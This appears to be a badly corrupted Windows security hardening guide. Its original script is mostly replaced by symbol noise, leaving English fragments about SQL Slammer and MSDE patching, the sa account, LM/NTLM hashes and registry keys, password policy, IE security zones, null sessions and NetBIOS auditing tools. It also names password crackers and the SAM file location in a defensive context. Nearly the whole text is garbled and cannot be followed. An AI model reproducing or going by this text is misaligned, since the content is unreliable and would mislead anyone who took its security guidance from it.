$ SQL/MSDE 56 - Y - Y $, 5 0, 5 - $() * SQL/MSDE Server, F , # 4 ) Patching " 5 % < 6 #P < ) Domain ( 5 ? 6 ^ " SQL Slammer # , # 4 ) Patching " 5 nH 3) l ' F ! 5E - Y MSDE 2000 ! ". /0(123& ') # < 9" ? http://www.microsoft.com/sql/downloads/securitytools.asp ? 
@ SQL Critical Update Kit $-,< K Toolkit 0 5 , 4 6 & % < ) -,< -, & SqlSecurity.com 0 SQL Critical Update ) SQL Scan !89 - K 5 $, 6 $l ' & 0 )? & A ^ UDP1434 7 4 wxsx 7 SQL Pingv2.2 ( 4 _X02 SQL ? , 6 U ) & : 2 UDP , ] 0, 5 I T Subnet ) * - 5< I SQL Scan Microsoft 0 ^P !89 ) - l ' &'( #B 5! 0, 5 TP ("c v 4 ?@ (8! ! " %& "7 B 5! $l ' R4 S @ : % 9 456 123& 6 DY/ I a K5 GDEFE UDP C 2A SQL/MSDE Monitor Service ? 2A& A * AB • -, < K 6 S @ : ) BH " - Y ) SL MSDE 2000 ?), ) ) - " ) - Y UDP n 9 " F User & @ b ) %L 6 O* 'L 7 T ( ,H $ )- #P< #P< ) 6-" 1 @ " U4 F SB #P < ) ^ account 2#5 F &1 e G O* 'L 7 R4 N`6 0 <; ! ) Domain 6- Y/ " 0,6 UDP 1434 7 4 ,L 0, 5 6 0, 5 T s}~ IP !89 6h @ 0 ? 5 TG' g ] Dos \ " F _U ) 7 B 5! MSDE SQL/MSDE 1 , I SQL/MSDE -, 6 U ) F 4 # " I' ' $l '( ' " MB/Sec - E 4 " j - 1 @ 2< 0 ,K 3 I F I Ms-SQL/MSDE Slammer ( !89 Multicast \ " $, n . $W , $ ,L s}~ % < , 6 3 j &' -, 6 U ) FSystem Local ' - Y $, 3(E Buffer Overflow , MSDE2000 H , , ) - 9* e G $ $l ' 0 5 SQL Pack 3a Server 2000 - 56 F ' n 9" ( ,H ? ( E ?# C 85! ) W L 3 + : $-,< P [ 7< & h 0,< ,6 3 3 #P < Pack Service # 7"+ H ; • Pack Service 6* 2 3@ G2000 a" , SQL/MSDE Server 7.0 Service Pack 4 Pack 3a MSDE/SQL Server 2000 Service P ! G Pack Service # A 7" I A1A 8 9 Patch # 7"+ H ; U) 6* b 5 -, < K 6Patch 2 3@ " -,< K - Y " 6h @ " ? I SQL/MSDE/MSDE -, 6 21 " ? F Patch 2 3@ SL " ? 59 a 6@ I 0 5 - Y ') # SQL/MSDE -, 6 U ) : SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE 9 <+ &H J K 7 + ,Patch + H ; • Patch # 7" I L2 Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 G A &1A 8 Patch ? $ Web MS02-061 I 0 -, a 5 - Y K " "2 9 -,< K Patch 2 3@ " 6h @ " ? 6 @ ) ? 59 SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE I GPack Service # A 7" I A1A 8 A 9 Patch # A 7"+ H A ; • -, 6 U ) 6* - Y b ' ) # -, 6 U ) 5 -, < K -, < K 6Patch 2 3@ " 21 " ? SQL/MSDE/MSDE F Patch 2 3@ S L " ? 
59 : a - Y " 6 @ I 0 5 SQL/MSDE 6h @ " ? SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000 (MSDE 2000) MSDE Patch # 7" I A 9 M2 <+ &H J K 7 + ,Patch + H ; • Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 G A &1A 8 Patch ? $ Web MS02-061 I 0 -, K "2 9 I 0 -, a 5 - Y K " Patch 2 3@ " 6 @ ) ? 59 -,< K Patch 2 3@ " 6 @ ) ? 59 "2 9 6h @ " ? SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000( MSDE 2000) MSDE C 5! l '? # GAuthentication Logging SQL Server ? 2A& A *• Enterprise Manager 785/ 2 1 ), _sa” ( " n 9" ? # G ;NA 8 A sa Account # 0 , F, , e G j * $, < -, < K 7 4" Server Book Online sa Account P !& ? " - Y O%A • 1A, I A+ 3 _blank] # $ MSSQL/MSDE P !& SQL/MSDE -,< DY/ P !& ("c 0 < , 63 H Administrator (SA) Login System 2t 5: W L3 ("c ? 59 - Y SQL/MSDE SQL/MSDE -, 6 U ) 0_ TG' g 5 ( ,H 2 ^ - Y l 'account " 9 K 7, 5 0 _Server Properties Security ] , account " -, < 3 <] e 'j 4 ^ ?@ ? 5 TG' I R4 7 ) X ("c /] 0 7 ,H the SQL Server Administrator Login j * ) ' ) # % & $, 5 MSDN / 5 -, < and Change the System Administrator Password by Using ) $ Changing ) , #4 I -,< K 6 ) 7 # 2 3@ " ? MSDE Verify 0 5 - Y $sa Account S I MSSQL/MSDE I A U) 4 : Domain ? 2 ! ] Z F^ B . 7" ) _NT "), ) 6 56 A 6 A• GSQL/MSDE Server Agent 1A, . $ SQL/MSDE Server Agent ) -, 6 U ) ] Local System ) A AM2A C A ? &A I 7" ] SYSTEM S @e G U) %H , / MSSQL/MSDE account Valid ) administrator domain 0 _XP ) pqqq "), ) 0 ,6 3 #P< ) % T ?# F Z F Domain $ a 4 " : 2 auditing ) Windows NT Authentication ? 5 T G' U) $-, < F 7 #< )& @ MSSQL/MSDEServer 0, K5 T G' ? @ C, E ) = H " , 6( E N 6Login ' ? , U) , #4$? # 0, 5 - Y Authentication NT #P< " g 6- ),. F) 3 ) : y B'0 ) ) 7c L W L3 R4 7 W 3 TCP/UDP ;! , ? , 6U) ^ P P 6 ("c 6U ) 4" F 3 67 4" N 4 ( E bP ) MSSQL "E $ SQL/MSDE -, 6 U ) " 67 4 z) 3 ) ) ) ) B 3 ? 
5F G5 SQL/MSDE 4 ("c # B' 0 B' G5 ) R4 S @ % y y wxss ) wxsx $, < wxsx ) wxss - Y ^ 1 @)j 0 ^ !89 $ (E 25 " - Y TCP/UDP l ' 67 4 " 6 @ a 5 - Y I " - Microsoft SQL/ MSDE Server 7.0 Security - Microsoft SQL/ MSDE Server 2000 Seurity 6h @ " ? ! " % &# 2 Windows Authentiction % G 6 6A) ? 6, ) Q0 b f -, < - ) 6 '-,< d * + " - Y + " - Y DZ 0 N` 6?), ) " U 4 ? 5F ) " )- 6% 6account # - 5 account , N ) = G0 < ( #. " I' H ?@ =GX P !& u -)8! /) + ,6 3 F) 2 3- Y R 0,< ? " H % ! 3\P ? " + P! F) , B 5! $ ) X a P !& < ,K , 75I € P ! & ,H ' ) = GX F 6 1G'( E 6, 4 , 4" 2 1 ), ) 2 5 ,6 3 < 6(& # " - Y ] -,< , K ? + $ 0 - 6 \ ' i: 2 1 ) E -,< 2), S @^ ,K •c $ P ! & ,H ' ) = GX account -, < K : ) -, ,6 3 = 9P ? @" 0 H , F7 , , e G < TP, ,F , , , b SB ' !89 F ) -, < = G U 4 0, < F ) , K " U4 ? @] 0,< _0 2 , K " U4 0 < ,6 3 N 1G' # , " - Y )? 6" E ) 7 " S[ ?@ 0, 6 6 1G'$ , -,< H _7) Y & P P! & ) % ' DY/ I ? ?# ? P! & 2 P ! & 2' - "E 5 $ / C 5 ?@ ?@? 6A) $ !89 6& H -, < - ?@ ) ) T) , P ! + , K " P !& 6& " ? P !& ? " 9 P ! % <& ^P R4 -,< = G Account • S DY/ (, ! • 0-,< = G , account E ?# $ F = GX 6 &'( 0, 5 4 5! , B hashing 5 N1 " -, < & ) ) , \ 2 P - F) 2 , 5 ,H 6& " - Y 0 2 ), 5 0, 5 P !& ? 5 T 0 < X ,K + " S ) ( #. 3 1 ) GP 2 W L3 6& "), ) _hashing 6 *1 E/ F) , K _ " Hash , [ 19 a " N1\ ) 6 F Hash , D " ("c ("c P ! I5 $ P !& DY/ = G 7 L , - 3• P! & message digest] - , <R ?# # b E _ < $hash , -,< 3 < 0_ P! & d • 6 E 0 ?@ -,6 ) - 3•M Y< - Y ? N1] b )d* 7 ) P ! & ,H ') )- / SB g 0 < ,6 3 ?@ h 83 ( 'hash , , Hashe , 6' P ! & Hashing N& ] 3 ) -, < N $-, @ %5G1 P • )% ! 5 "), ) 5 ] LM • NTLM • _ 5 LM] Lan Manager] " LM -, < Hash ^ XP, 2000 , "), ) LM # F 0, 5 " " 7, 5 #< $ F $, < P ! 6& - 3•_ B . 7 P LM , ( #. 6 &' * 7 , H -, %#< 2 , B G' 6 # ) P 5 ] NTLMv2 • ) ) X "), ) B G' 6b. Q # e 'j 4 7 L _ < NTLM, ] ' ) # #< - 5/ " , ] NT GX) pqqs "), ) N& T, " - Y _NTLMv2 6& $, 5 ) 7 ,H 1 ), & LANMAN Hashes] = GX S 5 P ! Z# L "), ) P ! 
6& /, ) W 3 K6A) " - Y Y6 0,< , 6 3 HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e n-us/security/securiy/h-gly.asp " % c, LM hashes =GX a 0, < 0, < % ,P - $ 13 0, d * &E 7 B 5! Y6 H F P Qf ) , 5 ! 5E ) 2, ) Hashe d * d * & _dictionary- style] P @ hashing LM A ) 2 6 < 0 Lan , K , @ 'SAM Lmhashes " )? , ?@ ) K62< A) % HS %H , / 0, < P !& - "), ) 2 )d * ? H F 6& • Ih / 0, 2 F 6 F - 3• :3 ) , , ,F -)8! 0 ,6 3 e 'j 4 7 L ) SB g Manager # ("c 0 N1" - Y 6- H$ ' R4 -, < S L I 5 hashes LM = GX T , K, @ ' ? ) 6 '_ , ' )n. R4 S @ LM hashes A) " - Y 5! ? P ! K6 < \X - < # 2 6 F K6 < 2 5 ) ,K 5 P ! , ` 4 0,< ,6 3 6 ' P !& U) 5 hash 6& • P !& d * , 6 3 -, < 2 5 > ?@ )- 5 b P ! - H, , e G -, 6 U ) 7 B 5! $, < # 6& • 0, -, < % , P • & M) / Y6% < C ' )- P ! -,< , K / S 5 ,< #< C /8: 6& • _cracking] ),. R 3 ) l '7 B 5! % 5# S P ! hashing , @ ' 6 F 6 ?# S j &'Hash T 9 P Y6j* ) C ' + >'" - Y % ,P• & M) / C 5 0, & ),. !89 5 2 <] +5 l 0 ,6 3 Y , 4 CG:H ) ?# C 85! P! 6& ? )@ GX) , - $() * 0, H,, 2 e G "), ) + 0 H F U) )- 5 V & ( #. - Y " 6@ 6 5 - < %B !)%c " # % / 0 5 - Y 1 ) $, -, ?@ # 2 " E ' B . " ) 0 ' ,6 3 #P< !89 2 C,E ,6 3 S @ e G $,< - 5 ) , 5 ,H " : 2 P! & 0, < P ! - 3• B . ) • Bc, # < F) -, 6 U ) ( ,H 62 < " \ 2 ! " 6& % E I 5 ("c #B 5! . - Y • 0 " - Y = GX 0 2000. NT "), ) # 4 ) - 5 LM hashes T <% K6 H F P, K , " HS @e G 6" E "2 0 LM -,< P ! & -, 6 - 3• # ) " I ' e 'j 4 7 L Lan Manager hahes I5 ? " b ,< ? , " ("c a , -,< SL e 'j 4 7 L XP, K6 P ! ?5F t6 F) C 8Q ) ("c 5 $ LAN Manager hash ^P # ZF 5 John the Ripper ) _LC44 ] 10phtcrack version " ? " 5 TG' 6Account 6 &'( ?@ 6* ! ". /0(123& , I 5 6A) 2 P " R 3 ?), 0, : 3? " 6& cracking P ! d * P ! & =GX +, ,6 3 E 456 123& \ '2 P )2 6%5G1 %5 ) ( #. " ? 59 #. I5 ? @ a - 2N + ,P QR & Q;3 4 ? L• P! & 6? ' T /2 ! ' ? "W L3 )S )- 6A) " - Y P ! & -, 6 d * A) # F 6 SB g 0 0, 5 ], < 2 " \ 2 0, < _?@ =B* : %5 P ! Y _password] , 5 P ! 6& O* # M /2 1 ) 2' ] ) , " <P?@ ,1 P " P ! M) / % , P ( ,H ?@ _ ("c 2 ? !7 P ! 
'L #) h c 9 < )@ ] -,< F " &N F 5B 6 E H? _ 7 - -J) ("c 0 < (E " ) -,< - 1 ) K5 - 3• I ? K6 5 $O 3 & # 2 ? " 2 ), " U4 _ , P4 H& password d * 6& - <& 2 ? ) P 785/ ?, < F H I T \X W 3 - 3•" M,6] ,<P %# I 5 ("c %5G1 $-, < = G ( O %5 P !& " P ("c A" @ ? 3 # / ) KP Y1M) / " ! - 5 MR / 5B ? @d * 6& " O* , M) / P ! % ) 5B ) " )@ M) / ) KP Y1M) / " * 6 " , 6 3 785/ 3? 5F E ) O * W L3 B' ( -,< & %#< " ,G0 )- < 6 ?@ -J ) M) / ) , ! -,< 3 < ( 0 <- N& " - Y ) ,G I5 ) - 5 0,< ,6 3 crack 0, < -,< h PH ),/ P !& " -J ) = G password ) - P A) " <) " ,< -,< 3 < 5B 3 & 7 B 5! $& @ P 785/ P 6%#< % -,< Y ? @ 0, 5 = G N F2 P <" @ 6? " 6& password ( C ' P !& d * N F- 5 S ("c 0 5 crack 2 -, < 3 < • ,G = G - . W L3 Q # # 7 5B -, < & P! & ? (E - Y Hl ' 6 &' * " - Y T#< A" @ ) S 9* & " ) - 3• P ! 6& (8! 6%5G1 T 5! " U 4 " ? P! , 5 ,H 6& Local . I5 2 PF 62 ) " & 2 pqqs $XP $pqqq"), ) 0 6& I 5 "), ) ) 4 " ? 59 6* )- Y Q " 0, < $ ? b 6 " ? & : - Y -,< ? 7 u j &' -,< = G I5 -,6 a 5 TG' Securty Policy Local Security Policy Program Start Pr ograms Ad min istrativeTools Local Security Policy Select: Account Policies, Then password Policy a ? 5 TG' Password must meet complexity requirements $l ' ? " , ` 4 ) ( #. m .1 -, < = G I5 P! F 6 , ! 6& $ 1/ 2 account ( " 0,< * 0,< a,< " ! 5E " -) (&B 0, < a, % 5 ? ?@ " ) = G " U4 ) 3 B P H " P ! (, ! W L3 ? 5 P !& K6 % < P !& _Z A] B N P Y1• & M) / • _z a] B N PY1 q M) / • 6 H ] 6,6 _ %,µ, s/ ,! C 8Q] KP Y1 g , " 5 $ P !& j< %H ,/ " P! & u ) E E )(5 % < _{ U4 • Policy Local Security " 75 I 4(H • • 6 SB g apassword history (range: 0-24 Enforce) B P H P! & ?56C,E $ 3 5 d* 6& " - Y ? "E ? ("c ? 59 #P< ? , $S P !& " - Y v $l ' Z> " " - Y 0, 5 - Y $, ,F -,< = G P ! & 2, 2 , 0, < , ,F GX) \X ,N 2 ) - )@ I 0,< , ? b < TP, , # 4 " U4 B '8 P ! #P < 6& P! & $ Y 5 $ P !& `* d* , $") S / 0_, 5 $") S / , 2' P !& P !& I _ u _ P! ] 5! Q , / P !& 3 P !& u H B 'c ,< ,6 3 minimum password age , # 4 0,< maximum " N m.1& password history u 5 ,H ) M , 6 -, P !& P! # P !& 0 ? 
, (&B LOG on 7 B 5! $? : F) ?), 0, < -, < P ! 5 " - ), . " U4 ) = G _, 5 # &1$,< minimum " 0, 5 #P< F) ? , ,F F) ? , ,F P ! e 'j 4 $Characters Minimum password length 0-14 T 9 %H ,/ ] , 5 - , b , password history 0 _ P! & 3 S d* Y password history % 1 2 , 0 < ,6 * , G %H , / $l ' ,P " 6 O * password History % 1 2, 0 < ,6 * , 6& -, ("c ) - P ? " P! & _ u] = G O* <( E 6 '? @ ? " 7, ?,< 5 , 6& " , E - Y ? # ) -, < 2 ƒ e 'j 4 )(E Y " j password age minimum , -, < = G ,< H? l '? " 7, ] L * I _ P! ] )F $ Y I P !& 0 Days Minimum password age (range:0-999) ‚, < , 6 3 d* 2' Minimum password age 0, 6 ) [ (&B -" F ? & )" " , u # " % PH ] , 5 ) YB* F) minimum password age < # " %P H ] 0, 5 - P - Y Maximum password age (range:0-999 days) 5! Q , / $l ' $l ' 5K ) 5 GX) u ?# 0,< 5! P !& 2 d* P !& P! & = G T 9 %H , / : ("c 2 ? T 9 %H , / 0 # MR / P !& 0, < ? " 0 ' I F) 7 ) X $ Y 6 " 6 , ? 0, - 4 : 2 , - ") , W L3 )S 0 ' $ P! & F) 'Y< ) d * : , $ #P< 7 !89 6? " 2 " 3 In the domain Store password using reversible encryption for all N& " - Y P! & " K6 ? , K , @ '( E N& W L3 " ("c 6& P !& ] 6 7 $-, < DY/ 0 P! & 6 @ I - 3•0 15G P! l' P !& " - 3•$ ) ) K6%# ) 4 -, < K & $, 5 6& $, 5 - Y - Y ?, < T G'2 " - Y 0 users $l ' 2 " 4 ? 5 m .1 d* 5/ 7 # $ : I P ! 2 7 , 5 ) ) 0_ I - 3• ( &1 I ,G 0 6& " 6 P ) " %51 E I ?@ " ? K6A) " 6account " F$ 5 - Y ? R4 # 6 -, `4 a P ! b3 n 9 from Command line Promp: Net User Username/random 6) 56] -, ` 4 ) ' L I P ! P !& 6& - Y 6 P GH ) ? & cracking ("c _ P ! P ! ) -, < I5 S ^P 6 6& F$ P ! , @ '" , < ? , " ("c " E S ("c " E S 6& $l '%5G1 P account _T 9 # $l 'A) 0 < 5 )6& *] - j 5 .Y Service accounts Y &5 - <\ X 6 ^P A) 2 Stand alone ?), " U 4 0 < - Y cracking • F " GX) 2 0 P ! C, E 5 $? " ) l '7 B 5! crack ? @ $ ?@ P! ) -, $ 6& 0 ? @ \8 9 H?@ 3 I N ? " (, ! 0, < / G ;3 A $? b 6& 3 ?# -, < - 3•?@ SB g 0 <- v 4 6%5G1 ) C 3 0 <I $? DY/ : ? @ DY/ (,! 7 ? K6% ' I ' DY/ ) ,< A" @ ? 3 = GX $ K6( 4 2 ` < $ ) [ >/ ?@ " , < )W 3 ("c ) P ! ) 6& -, < % L , Y 5! 
( 5 -, ("c 2 K ("c 6account F $, 5 6A" @ ? <• (E MR/ 2 1E 0 6 N4 0 ^P 5 6 $ 5 - Y 6account &5 ) : , P account ) 0 2 F ? , GA ,account #P< ) 0, < 4 ' 0 K B 5F " $, P !& " %P H)S E $6 ) H 6 F) ? N ,< P !& 3 ("c P !" “ and must be changed Your password has expired O* $, < H,, e G A" @ P! & 2 < (,! $ N 6& ,K A 456 • 2A N +A ,P 0 ' ,6 3 B . P ! crack ("c "] $ P P! ?@ ?, 6& & $_ E 6 % < P! I l '7 B 5! $ O * - . W L3 6& F ) \ X P !& P! F ( E -,< DY/ 2< ( E -,< DY/ 2 < -,< +H ) F $ 6 0 K6A) " - Y $= GX , 5 ,H ) #. %5G1 6& . 7 $S 0 ? P! craking P !& B 1 I K6 & N : ^P 6account ? )&' I 1 -,< , K ) " - 4 $,< W 3 K62 ) 5 ?@" - Y 0 ?@ ? (N " K6account MR/ ) ) X 3 "% , ?@ , P4 ' account MR/ I %L 0 S , N) )% ! b - Y & $ F P 4 -,< K -, < K 3 - Y $, - 5 V I : G 2N P 7 # " - Y 2 P$ % / ? 59 62 ) " ? " # 54 :&N 0 1 6 „ 1 # 2 3@ 56 1 P! 0 )? 3 - + $S&• -)8! ? $ P! & 6 & " $ #P < 6U ) P !& , N $S 2, 0 0 lan &N F 6, & 2 LM A9(? 2A& * B • G ;NA 8 _Version2] Ntlmv2 NT LAN Manager A) " - Y Manager 0 $, K I ,6 3 6(& # P ) I #. N& " - Y E , B $ " T),F a,6 ? $, 5 T - 5 M 9 $NTMV2 v 4 |j1 LM pqqq ) NT "), ) 6=G l ' BH Rgistry key Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControl Set\Control\LSA Value: LMCompatibilityLevel ValidRange: 0-5 Default :0 f4 Y 2 , , )d* , K A) ) \ $l ' Q 4 • a,< 7 # " & 6$NTLM ) LM A) h v 4T 0 < 5 - Y NTMv2 NTLMV2 7 # " - Y NTLM , K A) h T …p NTMV2 , K A) h T …s LM , K ;! DC …x ) -,< NTLM ) LM , K ;! DC …r 0 ' R4 NTLMv2 , K C ' …w 0 - Y ? 0 5 lan Manager , K i: 6 pqqq "), ) LAN ^P 0, #4 75 I , #4 ("c : $ Manager authentication level security: Network I ) SP4NT "), ) $ 6 -, < S L ?@ " , G ) ? , U) LM hashes T " 5 ("c 2 5 ,H ? , U) NT Lan ? E 4 , 2 6& " - Y 7 ? I K6 $ NTLMv2 , 5 # ‡ NTLM " - Y : # $, < f4 , Controllers Domain I $l 'U ) 0_ #P < ) (&B P LM I BH " - Y ) Y _ {† "), ) hashing 0 5 T5! Domain Controller 0 ' 6 SL " U4 0 0, < $ 5 NTLMv2 " - Y u? ) 6 , 5 - Y Network Client Microsoft - 56 $, 5 ? 
O* S l ' N 4] ' LMCompatibility ( , ) Directory Services Client ?@ ) (5 NTMv2 " {† ) {r "), ) e 'j 4 7 I 2 ) $ Manager authentication Level LAN 0, ) ( ,H ? @ " Security Options ) Policies Local O* S pqqs ) XP "), ) ) , I ) T G'Policy Local Security & • # & XP ) pqqs $pqqq "), ) -,< K SL , , ) {r "), )] : I Manager,version LMCompatibility Level authentication level Manager ("c 0 ' U) Send NTLMv2 Respone only\Refuse LM I ) ), . T 5! $ : MR / ^ P B %K & 2 ? @ " - LM hashes E ? 5 TG' g 1 )- -, < SL ? @ ) (E 2 l '7 B 5! T $ " ) ,< ,6 * Value on next 0 ? , *& • LM hashes & # ') # C ' F) ?@ " - Y XP ) pqqs $ _ -, < E l ', B Windows 2000 Domain Controller ) 5 - 3•& LAN - < # 2 6 E , B0 I 3•$ #P< I ) SP2] 2000 "), ) ,G 25 # GLmhash + A 1 A7T " ) SAM 0 ?# Local Security Poclicy , # 0,6 $Lanman hashes $,< E $Xp ) pqqs "), ) & ? 5 T G' ? 0 password change Lan manager hash network security: Do not store ("c : 2 ) Local Policies 6 $l '7 - < hash LM " 0 ' # 2 # " I M ,6 ) T G'Policy Local Security & u T5! " U4 0, O* S Security Options ("c 0, < +H ) [ $-, < E 7 u -,< " , - , ,F hashes LM E W L3 P !& - 3• : ) ("c Y7 N 4C ' $-,< K 6A) F LM hashes ) 0,< , 6 3 MR/ $,6 Rgistry key Hive: Hkey_local_Machine Key: System\Current ControlSet\Control\LSA\NolMHash (E u 3 6 & GSAM :(A AVL + A A ,WA A & 6A) " hashes " P ! A A *& • Hash A AU;( + SA A 0 6& ? )@ , $ P ! & cracking I a, 5 4 " I 2 , a #P< " P ! - Y 6& = a 2 ] #P< F M, 6 - Y ethereal 0_ 0-,< ˆK 6 #P< " - Y #P < 67 MR/ ) d * I , 1' pqqq ) NT4 "), ) b < ,6 3 % '" - Y _ C:\Winnt\System32\ Config F) ?@ Q# ?# "C ' SAM % '0,< -,< " , - ? 0 )@ - 56) ), . Controllers Domain C L3 @ 78# 3 I & Repair F ) Lock "), ) N % ! , & 9 i: j &') SAM % ' Q # " ("c : l '% '0SAM % ' Q # $l '% '0,< 2< 6& " ? 5!] SystemRoot%\System32\Config C % ! 3 N 4 6 Backup I # &' ) -,< ' Backup 7 !89 " 0 a 5 - Y " 7c " ? 
B5# 7 !89 R3 - How to Disable LM Authentication on Windows NT - How to Enable NTLMv2 Authentication for Windows 95/98/2000/NT - New Registry Key to Remove LM Hashes from Active Directory and Security Account Manager E ! " % &# $X Internet Explorer (IE) 0 ' ) # ?@ "), ) ( '784 N ( N ) Patch 5 $, R4S @^ h IE ? 6T R4 S @ ^ 0 T#< ") 85/ , 6 ) B . % $ 6 K6 * ,6 3 " 5 IE ) ,G F) "), ) ) K6 6 ) SB g " - Y 7 ) X, < 0 ) SL & + 2 , ,F ) 2 3@ " 6) 0 < ,6 3 -,6 ) IE W F) IE < L3 ("c Windows U ) 5 6 $, < -, 4 R4 S @ ^ - Y "), ) ') # 6 &'( / $IE ) , F) ?, 0 < ?@ ! ". /0(123& ) # 6Patch SL # http://windowsupdate.microsoft.com/ ? 0 ( E " ) HFNetChk " ? , F) ' Update Windows U ) ) # Analyzer Microsoft F Online ) HS @), , e G , < T G' 0 5 F) $, 5 C 5! ) SL ,6U ) $U# +, -, < - < 0 < ,6 3 ) # ) - *1 6, ) 6) Z '?@ , $() * 7) Y ) )Y ?5F T @^ 6 Y $T G' 6 6% ' R4 S @ IE $O) 7 Y. a I . # R4S b l ' R4 S @ ^ Z F $0 6* , 63 -, < ( E ? 5F ) MIME \ ) ,6(E 0 $IE ) IE -, < SL , G 78 5/ ? $"), ) U ' ' & $ B . -,< SL e 'j 4 O) ) -, < S L " ? 2 $, < -, 6Patch TG'update 0 5 - Y Baseline Security Check Qualys Browser a I _O) 0 5 - Y $IE GX) P ) F &1 @ ,< 6 &] B : )c ! " %& IE ) Y - Y ) 2 -,< - < R 4 S @ & IE 1 ) )- 5 I # B ! 0, Z 0, < 0 0, K5 ( N ) Z - Y % H) W L* S @^ ‰8 ;! ("c 6patch ?@ $ 6Service Pack + F Patch 2 3@ 0 5 SL ) ("c : & N 'X IE + i. %/ , ? #4) I $l ' 3 7 # " % 0, * P R4 # IE ! 5E IE GX) ? ?@ a 5 TP Inetnet 6% bP & O* • Custom Level ? 5 T G') Security Tab & O* • 4" - Y Z T G'$ " n 9 " Options Tools ("c 2 0, a <( E %1 , $IE " F) (,! $ $-,< K Service Pack 2 3@ _†pp{pr] 6Patch ("c 0 5 - Y Explore 6 SP1 Internet a h @ " ? 2 F j< * - Y 5/5IE * 4$ 0 6Patch ("c F SB g W L3 2 $j< l ' * - Y IE6.0 * " # ' 5 456 123& R4 S @ ^ 6* K P 785/ Q Zone. R4 S @ ^ n. $ActiveX Controls ) Scripting Active 6@)7 I l ' 6% 4" - ) ?,< Prompt for Allow paste operations via & $Scripting j * • Clipboard n 9 " ("c script TG' g I . 
W L3 5 Active Scripting 0_, 5 - Y $l ' % N4 - < # 2 4" 6 Download signed Active X Controls O) " Prompt O* ("c] 0 < ( E " ,G & O* $ • Download unsigned Active X Controls Initialize and script ActiveX Controls not Disable & O* • Disable & O* • marked as safe & $Microsoft j* • & $Microsoft VM j* • High safety for Java permissions High safety for Java permissions N 4) )F 6 B 4 i. F I ("c 0 across domains Access to data 0 TG' g Cross-site scripting 6" E O* $ & $ Miscellaneous j * P 785/ " G5 ^P • I 5 $sources ! " % &# R Windows Remote Access Servies #P< ^ P )Y -, < K „ 1# 6% ^ 6 „ 1 # ) 7 # $"), ) 7) Y 4)7 # " -,< K 3 6 K ) : 2 0, 5 , 6V < ? `56 $_PRC] 62 ) E 3 ') #P < 6 BH ) 7 # 0 3 " ) 6 '2 < + 2 F + GX) , 5 ,H ) F ? & & 3)- 3 , " ) " g@ (, ! ) l '=GX ^ $? & 6 '? & # l '% < TP, " 7, F - ) 3" + V <S , 7 L ?5F b ?@ " ?# K % b <R V < ) CIFS File ) - " 4_ (E , b ?& ) K6 * _ - < ) F "), ) ) ,5 I ] 6h) ) ) 6 / 6 ! DY/ - Y " W L3 ) P Q M ,6 l '? 6% ' T $ #P< V < S ? , _ ) #P < , # 4 (, ! % 1 , B . # 4 (,! % 1 , 1 )- 3 7 / pqqw T " 2, ? & " - Y $ #P< V < i. 0, < S 7 B 5! ( E ?# $l ' 6%# ) 4 0,< CH ] 0, 5 F 7 # " % '" - Y Z - $, l '+ System Common Internet ) " 456 Q -NETBIOS H #P< #P< ? & 7 B 5! " - 5 6 '$?@ P l '(& # (SMB Block Message Server)] %# ) 4 ( ,G 7 5F 0 ! " - Y ) 6 '& ^P K6 , 1' ) % 'V < ?# $"), ) % ! -, < <R V < 0 Logon NULL 6i :< 8 Y ^P 6 ) - ) "), ) 4 6 3 $l ' 5/ ) K #P< 6%# ) 4 Q Anonymous $7 B F $NETBIOS #P< ) - " 6* 0, 5 0, 5 ("c % 4 $ #P < E 6@ ) 6 , 1' 3 ) 6 I] 6 ' #P< ? ) F + 2 < ) ?, 3 ?# $ < ( E #P< -, < <R V < + 0 ' ,6 3 j6 . " : 7, , " " 3 $ 3 ? #56 <R V < P , )- Y Z _ 6% ' #4 # 0 :3 ) Logon Anonymouse Null Session 85! $Session C P !& )( ] l89 $_ 13Null Session " 0 6U ) 0 - Y 6 ) "), )NT ? G $Local System account E n 9 " #P< ? G $bP 7 L 6 A R4 3 : l' 0, 5 Null Session H$ $ P H ^P Local ,K 1/ 6* I5 Z F 0 * ?# $ " %1 , 1 ), 5 5 6 ' u ? 
# $pqqq "), ) " % P H 6* KN* 4 Session Null pqqq "), ) 2 ) 6' , _ & + R 1 : ${†"), )CE $NT $pqqq $ME ) XP B B & ) 6N , , # 4 $ &'( - P< 7 5 I H 0 ) - Y $? , 6 native A R 4Null Session ) 6 $? )Z F B . 0, 5 %# $ 6-) Z F computer account Local U ) H ) 6 'pqqq "), ) " % P H ] <+ I5 ) pqqqLocal System account ) # 3 7 !89 j 5 null Session "), ) 0, 5 6U ) 6U ) Computer " $, bP P! ?), -,< E 1 6, F) I5 ) ? @ ) 6 '? 5F ,6 3O * Z , < -, 6" E 0, 5 b E !89 E - Y " $ P 75 I ) - " 23 , - 9*5 ) l ' GX) " - Y Z :&27 RPC Remote Procedure Calls:[ " ] "), ) 6* " , GNT $pqqq $XP (& # " 9P I nter process Z F T/ ) - " ) N ?& 0 ' 7 F , 3 ' ) 3 - *1 , 0_ B . F \ " 785/ ( E 3 H F - Y ) ,G 785/ ? 0,< H F 2 Blaster/Msblast/Lovsan ) 6" E - 5 ] 0 Nachi/ Welchia " - Y 0, 5 H $? & $l ' R 4 S @ : " - Y ) - " ?& 6( 2 " _pqqs $ 0, - - Y l ' R4 S @ : " Dos R4 S @ ^ ! ^P $ RPC0 ! ") * 0, +, H,, 2 e G + %K bP : R4 S @ d * 7c #< d * I5 % 'V < U ) ?# F ? $l ' 5 & - .NETBIOS T L. &'Afentis security 0,< A8 " %P H 7 !89 #B 5! - . " )@ +5F I 5 6@ 2 a 0, 5 $ -,< h PH NAT ("c NETBIOS $, L W L3 : ,G " ? NETBIOS - Y " Netbios Auditing Tool ( -,< K ) W L* ^ 6* ! ". /0(123& 0 5 NAT 7 5B " b "), ) 6 B / $ ) #) " ) (E - Y $% ' h @ " http:// www. Afentis. Com/resources/win32/nat - Y 0 5 " , v2.11 Legion N ${† ) {Š "), ) ? % 'V <Legion b " , -,< K Rhino9 #P< V < $pqqq "), )? Checker)Security Fridays Share ? , ) {† ${Š 6* ] "), )CE 